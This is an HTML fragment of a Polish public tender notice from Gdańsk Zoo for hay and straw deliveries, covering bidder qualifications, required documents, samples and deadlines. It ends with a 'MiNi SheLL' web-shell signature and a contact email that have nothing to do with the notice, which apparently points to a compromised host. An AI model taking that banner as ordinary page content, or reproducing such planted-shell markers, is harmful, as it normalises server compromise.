mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> . O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/> dotyczące:<br/> - zdolności do występowania w obrocie gospodarczym: podmioty prowadzące . działalność gospodarczą zgodną z przedmiotem zamówienia,<br/> - uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/> o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku<br/> w powyższym zakresie.<br/>- sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku <br/> w powyższym zakresie. <br/>- dolności technicznej lub zawodowej: Wykonawca spełni warunek jeżeli – <br/>Wykonawca wykaże – że dla części 1 - dostawa siana – Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co najmniej 2 zamówienia, polegające na dostawie siana, w okresie maksymalnie 1 roku, o wartości minimum 230.000,00 zł każda ,<br/>Wykonawca wykaże – że dla części 2 - dostawa słomy – Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co najmniej 2 zamówienia, polegające na dostawie słomy o wartości minimum 20.000 zł każda , <br/>3. Przedmiot zamówienia musi spełniać następujące warunki: dotyczy gospodarstw rolnych wskazanych w ofercie dla części 1 i 2<br/>a) siano i słoma powinno być uprawiane na nawozach naturalnych z ewentualnym dodatkiem niezbędnych nawozów sztucznych,<br/>b) siano i słoma musi w trakcie transportu musi być odpowiednio zabezpieczona przed opadami ( stodoły, magazyny wentylowane posiadające dach i ściany.<br/>* załącznik nr 6 – opis gospodarstwa <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">zał. 2 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">5.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2)	wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie z podaniem rodzaju, wartości , daty i miejsca wykonania dostaw oraz podmiotów na rzecz których dostawy te zostały wykonane – załącznik nr 5<br/>3)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt 5.ust.1) składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument lub dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 6.	Przedmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)	Opis gospodarstwa – załącznik nr 6<br/>2)	Próbki oferowanego siana – cz. 1 ( zad. 1 ,2, 3) i słomy cz. 2 ( zad. 4) służące ocenie jakości – Wykonawca zobowiązany jest do dostarczenia próbek w celu oceny jakości zgodnie z opisem – zał nr 7 dp SWZ za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r. Prawo pocztowe lub złożyć osobiście lub za pośrednictwem poczty kurierskiej na adres Zamawiającego: Gdański Ogród Zoologiczny ul. Karwieńska 3, Gdańsk ( budynek administracji pok. Nr 3). Próbka musi dotrzeć do Zamawiającego w terminie wskazanym na składanie ofert tj. 22.05.2024r do godz. 10:00 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	Opis gospodarstwa – załącznik nr 6<br/>2)	Próbki oferowanego siana – cz. 1 ( zad. 1 ,2, 3) i słomy cz. 2 ( zad. 4) służące ocenie jakości – Wykonawca zobowiązany jest do dostarczenia próbek w celu oceny jakości zgodnie z opisem – zał nr 7 dp SWZ za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r. Prawo pocztowe lub złożyć osobiście lub za pośrednictwem poczty kurierskiej na adres Zamawiającego: Gdański Ogród Zoologiczny ul. Karwieńska 3, Gdańsk ( budynek administracji pok. Nr 3). Próbka musi dotrzeć do Zamawiającego w terminie wskazanym na składanie ofert tj. 22.05.2024r do godz. 10:00 <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.	Inne dokumenty dołączane do oferty:<br/>1)	Pełnomocnictwo lub inny dokument osoby lub osób podpisujących ofertę potwierdzające umocowanie do reprezentowania Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba lub osoby, której/których umocowanie do jego reprezentowania nie wynika z dokumentów – Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innych załączonych dokumentów.<br/>2)	Wymóg powyższy ma zastosowanie odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółka cywilna, konsorcjum). W przypadku złożenia oferty wspólnej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Oferta wspólna musi spełniać wymagania:<br/>a)	oświadczenie, o którym mowa w ust. 1 pkt 1 i 2 składa:<br/>- każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (na oddzielnym formularzu)<br/>lub<br/>- pełnomocnik (umocowany do składania oświadczeń) w imieniu każdego z Wykonawców osobno.<br/>3)	Jeżeli oferta Wykonawców o których mowa w ust.10 pkt 1 zostanie wybrana, jako najkorzystniejsza, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia umowy regulującej współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 439 oraz 454-455 Ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zoo_gda</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com